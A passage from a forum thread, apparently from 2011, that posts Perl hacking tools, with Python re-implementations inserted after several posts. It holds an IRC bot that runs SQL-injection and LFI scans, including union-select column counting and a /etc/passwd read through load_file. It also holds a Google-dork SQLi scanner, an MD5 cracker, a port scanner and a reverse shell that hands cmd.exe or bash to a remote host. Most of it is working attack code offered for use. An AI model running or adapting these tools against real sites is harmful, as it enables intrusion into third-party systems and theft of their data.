print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

sub lfi {
my $ok = 0;   # reset per scan, otherwise a hit from an earlier target carries over
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}


sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}

sub scan {
my $ct = 0;   # reset per scan
# the trailing parameter needs the ':' prefix, otherwise the server keeps only the first word
print $soquete "PRIVMSG $canal : [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal : [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) {
print $soquete "PRIVMSG $canal : [-] Not found any path\r\n";
}
}



sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}

sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub tomax {
return $nave->request (GET $_[0]);
}

#The End
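
The column-counting step of the bot's !sqli command, as an added example in Python that is not the bot's code: it appends one char() marker per column to a union select until a marker is echoed back, then places an expression in an echoing column between end markers to read it out, the way the details sub does with version(). The target here is a constructed sqlite3-backed page that pastes its id parameter into the query; string concatenation uses sqlite's || instead of MySQL's concat(), and sqlite_version() stands in for version(). The marker strings and the target URL are the post's own; everything else is assumed.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

MARK = "RATSXPDOWN"     # the bot's column marker
END = "ERTOR854"        # the bot's delimiter around extracted values
MAX_COLS = 52           # the bot's upper bound
TARGET = "http://127.0.0.1/sql.php?id="   # the post's example target


def ascii_codes(s):
    """The bot's ascii(): 'abc' -> '97,98,99', so the payload carries no quote characters."""
    return ",".join(str(ord(c)) for c in s)


def marker(n):
    return "char(%s)" % ascii_codes("%s%d%s" % (MARK, n, MARK))


def find_columns(fetch, url, pass1="+", pass2="--"):
    """Grow 'union select' one marker at a time; return (column count, columns echoed) or None."""
    cols = [marker(1)]
    for n in range(2, MAX_COLS + 1):
        cols.append(marker(n))
        body = fetch(url + "-1" + pass1 + "union" + pass1 + "select" + pass1 + ",".join(cols) + pass2)
        visible = sorted({int(m) for m in re.findall(MARK + r"(\d+)" + MARK, body)})
        if visible:
            return n, visible
    return None


def extract(fetch, url, ncols, col, expr, pass1="+", pass2="--"):
    """Put expr in echoing column col (the bot's 'hackman' slot) and read it back between END markers."""
    sel = [str(i) for i in range(1, ncols + 1)]
    sel[col - 1] = "char(%s)||(%s)||char(%s)" % (ascii_codes(END), expr, ascii_codes(END))
    body = fetch(url + "-1" + pass1 + "union" + pass1 + "select" + pass1 + ",".join(sel) + pass2)
    m = re.search(END + "(.*?)" + END, body, re.S)
    return m.group(1) if m else None


def make_fake_target():
    """Constructed vulnerable page: the id parameter goes straight into the WHERE clause."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, title TEXT, body TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'hello', 'world')")

    def fetch(url):
        raw_id = parse_qs(urlsplit(url).query).get("id", [""])[0]   # '+' decodes to a space
        try:
            row = conn.execute("SELECT id,title,body FROM items WHERE id=" + raw_id).fetchone()
        except sqlite3.Error as e:
            return "<p>Error: %s</p>" % e
        return "<h1>%s</h1><p>%s</p>" % (row[1], row[2]) if row else "<p>not found</p>"

    return fetch
```

Against the fake page the scan stops at three columns, of which the second and third are rendered; extract() then reads any expression through one of them.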





#332
Perl / [Perl] Search MD5
July 03, 2011, 09:50:07 PM
Hello everyone

Today I just finished an MD5 hash cracker, with or without salt.
This version has windows, using Tk

Code: perl

#Search MD5
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5 qw(md5_hex);
use Tk::FileSelect;
use Tk::ROText;

# hide the console on Windows only; "use" would load the module on every platform, "require" does not
if ($^O eq 'MSWin32') {
require Win32::Console;
Win32::Console::Free();
}

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

sub oper{
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

sub crack {
my $hash = lc $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;
my $ok = 0;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");return;}
unless ($hash =~ /^[0-9a-f]{32}$/) { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");return;}
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open(my $word,'<',$wordlist) or return;
my @words = <$word>;
close $word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
# md5_hex is called as a plain function: Digest::MD5->md5_hex($x) would hash "Digest::MD5".$x
my $digest = md5_hex($pass.$salt);
# digests are hex strings, so compare with eq; == would compare them as numbers
if ($digest eq $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok=1;last;}
}
unless ($ok) {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");}
}

MainLoop;




If you want to download it from SourceForge

Code: text

https://sourceforge.net/projects/searchmd5x/
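
The same search as an added example in Python, not the post's code: the hash is validated before any work starts, digests are compared as lowercase hex strings, the wordlist is streamed line by line, and both salt positions are tried (the post only appends the salt). The wordlist and the target digests in the demo are constructed.

```python
import hashlib
import re

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack_md5(target, words, salt=""):
    """Return (word, layout) for the first candidate whose salted MD5 equals target, else None.

    layout is 'word+salt' (the post's order) or 'salt+word'. Digests are compared
    as lowercase hex strings, never as numbers.
    """
    target = target.strip().lower()
    if not HEX32.match(target):
        raise ValueError("not an MD5 hex digest: %r" % target)
    for line in words:
        word = line.rstrip("\r\n")      # chomp; interior spaces may be part of the password
        if not word:
            continue
        if md5_hex(word + salt) == target:
            return word, "word+salt"
        if salt and md5_hex(salt + word) == target:
            return word, "salt+word"
    return None


def crack_file(target, path, salt=""):
    """Stream a wordlist from disk instead of loading it whole into memory."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return crack_md5(target, fh, salt)


# Constructed wordlist for the demo.
WORDS = ["admin", "letmein", "hunter2", "password"]
```

crack_md5 accepts any iterable of lines, so crack_file simply hands it the open file.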


#333
Perl / [Perl] Search in google for scan SQLI
July 03, 2011, 09:49:49 PM
A simple SQLI scanner to use with Google

Code: perl

#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds;
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}

sub get_links {
@links = ();   # reset per results page; agarrar pushes into this global
HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
}

sub agarrar {
my ($tag,%attr) = @_;
push(@links,values %attr);
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
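
The two pieces of the scanner as an added example in Python, not the post's code: the link extraction that recovers a site URL from a Google cache link (the post's cache:(.*?):(.*?)\+ rule), the cut at the last = that picks the injection point, and the single-column union probe that looks for MySQL's column-count error. The results page below is constructed, as is the fetch function used in place of a real request.

```python
import re
from html.parser import HTMLParser

# The post's regex cache:(.*?):(.*?)\+ : cache id, then the cached URL up to the first '+'.
CACHE_RE = re.compile(r"cache:([^:]+):([^+\s]+)")
MYSQL_UNION_ERROR = "The used SELECT statements have a different number of columns"


class LinkCollector(HTMLParser):
    """Collect href values of <a> tags (what HTML::LinkExtor does for the post)."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def cached_targets(page):
    """Recover cached-site URLs from the cache links on a results page, unique, in page order."""
    p = LinkCollector()
    p.feed(page)
    seen, out = set(), []
    for link in p.links:
        if "webcache.googleusercontent.com" not in link:
            continue
        m = CACHE_RE.search(link)
        if m and m.group(2) not in seen:
            seen.add(m.group(2))
            out.append(m.group(2))
    return out


def injection_point(url):
    """The post's rule: keep everything up to the last '=' so the payload replaces that value."""
    i = url.rfind("=")
    return url[:i + 1] if i >= 0 else None


def looks_sqli(fetch, base, pass1="+", pass2="--"):
    """Single-column union probe; MySQL's column-count error means the input reached the query."""
    body = fetch(base + "-1" + pass1 + "union" + pass1 + "select" + pass1 + "666" + pass2)
    return MYSQL_UNION_ERROR in body


# Constructed results page with two cache links, one of them repeated.
SAMPLE = """
<a href="http://www.example.com/page.php?id=5">Example page</a>
<a href="http://webcache.googleusercontent.com/search?q=cache:AbCd12:www.example.com/page.php?id=5+news+php&cd=1">Cached</a>
<a href="http://webcache.googleusercontent.com/search?q=cache:AbCd12:www.example.com/page.php?id=5+news+php&cd=1">Cached</a>
<a href="http://webcache.googleusercontent.com/search?q=cache:ZyXw98:www.example.org/news.php?cat=2&amp;item=7+news+php&cd=3">Cached</a>
<a href="/about">About</a>
"""
```

The duplicate cache link collapses to one target, and for a URL with several parameters the cut lands after the last one, which is the parameter the post's scanner injects into.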
#334
Perl / [Perl] Scan Port By Doddy H
July 03, 2011, 09:49:34 PM
Hello everyone, here I bring you a simple port scanner
written in Perl

Code: perl

#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $_[0]\n\n\n";

for my $port(sort { $a <=> $b } keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}



Usage example

Code: text

perl scan.pl localhost
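
The same connect scan as an added example in Python, not the post's code: probes run concurrently with a timeout, the service name comes from the system services table with the post's own list as fallback, and demo() checks the scanner against a listener it opens on localhost. The host and ports used in demo() are constructed for that check.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# The post's port/service table, used when the system services table has no entry.
SERVICES = {21: "ftp", 22: "ssh", 25: "smtp", 80: "http", 110: "pop3", 3306: "mysql"}


def service_name(port):
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return SERVICES.get(port, "unknown")


def probe(host, port, timeout=0.5):
    """TCP connect probe: True only if the three-way handshake completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unreachable
        return False


def scan(host, ports, timeout=0.5, workers=50):
    """Probe the ports concurrently; returns {port: open?}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, flags))


def report(host, ports):
    """Lines in the post's output format, open ports only, ascending."""
    return ["[Port] : %d [Service] : %s" % (p, service_name(p))
            for p, is_open in sorted(scan(host, ports).items()) if is_open]


def demo():
    """Constructed check on localhost: one listening socket and one port known to be free."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                       # bound but never listening, so the port is free again
    try:
        return scan("127.0.0.1", [open_port, closed_port]), open_port, closed_port
    finally:
        listener.close()
```

A connect scan completes the handshake, so it shows up in the target's logs; the timeout is what keeps filtered ports from stalling the whole run.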
#335
Perl / [Perl] Reverse Shell By Doddy
July 03, 2011, 09:49:16 PM
Hello everyone.

Today I bring a simple reverse shell; in this version it can only connect to the server that has netcat,
then it gives information depending on the operating system of whoever ran the script.
In version 0.2 I will add kernel detection and its possible exploit.

Code: perl

#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("/bin/bash");   # absolute path; "bin/bash" would be looked up relative to the current directory
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End

#336
Perl / [Perl] PasteBin Uploader
July 03, 2011, 09:49:04 PM
Well, here I have finished a program that will help you publish your programs
on pastebin quickly and effortlessly xDDD

So, this program has two options:

  • Publish a single file
  • Publish all the files in a directory

    It also detects the file extension so it can publish the code under its respective code type

    Code: perl

    #!usr/bin/perl
    #Paste Bin Uploader (C) Doddy Hackman 2011

    use LWP::UserAgent;
    use HTTP::Request::Common;

    my $nave = LWP::UserAgent->new();
    $nave->timeout(10);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

    menu();

    sub menu {

    clean();
    header();

    print "\n\n[Options]\n\n";
    print "[1] : Upload a file\n";
    print "[2] : Upload a directory\n";
    print "[3] : Exit\n\n";
    print "[Option] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[File] : ";
    chomp(my $file = <stdin>);

    if (-f $file)  {

    ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {


    $code = openfile($file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }


    } else {
    print "\n\n[-] Error\n\n";
    }
    reload();
    }

    elsif ($op eq 2) {

    print "\n\n[Directory] : ";
    chomp(my $dir = <stdin>);

    if (-d $dir) {

    my @files = verdir($dir);

    print "\n\n[+] Loading directory\n";

    for my $file(@files) {

    chomp $file;

    my ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {

    my $code = openfile($dir."/".$file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }
    }
    } else {
    print "\n\n[-] Error\n\n";
    }

    reload();
    }

    elsif ($op eq 3) {
    copyright();
    <stdin>;
    exit(1);
    }

    else {
    menu();
    }
    }

    sub copyright {
    print "\n\n(C) Doddy Hackman 2011\n\n";
    }

    sub header {

    print q(

    PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP
    PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
    PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
    PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP
    PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP   
    PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP   
    PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP   


    );

    }

    sub clean {
    system("cls");
    }



    sub verdir {
    # Return only the regular files inside the given directory
    my @files;
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    closedir DIR;
    for (@archivos) {
    if (-f $_[0]."/".$_) {
    push(@files,$_)
    }
    }
    return @files;
    }

    sub verfile {
    if ($_[0]=~/(.*)\.(.*)/ig) {
    return ($1,$2);
    }
    }

    sub extensiones {

    if ($_[0] =~/py/ig) {
    $code  = "python";
    }
    elsif ($_[0] =~/pl/ig) {
    $code = "perl";
    }
    elsif ($_[0] =~/rb/ig) {
    $code = "ruby";
    }
    elsif ($_[0] =~/php/ig) {
    $code = "php";
    }
    elsif ($_[0] =~/txt/ig) {
    $code = "";
    }
    else {
    $code = "Yet";
    }
    return $code;
    }

    sub reload {
    print "\n\n[?] Enter for continue\n\n";
    <stdin>;
    menu();
    }



    sub savefile {
    open (SAVE,">>logs/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub openfile {

    my $r;

    open (FILE,$_[0]);
    @wor = <FILE>;
    close FILE;
    for(@wor) {
    $r.= $_;
    }
    return $r;
    }

    sub lleva {
    return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
    }

    # ¿ The End ?
#337
Perl / [Perl] Pass Cracker By DOddy H
Julio 03, 2011, 09:48:52 PM
Hi, here I leave you a simple program to look up the decoding of an md5 hash

Código: perl

#!/usr/bin/perl
#Pass Cracker 1.0
#(C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

sub crackit {

print "\n[+] Cracking $_[0]\n\n";

my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
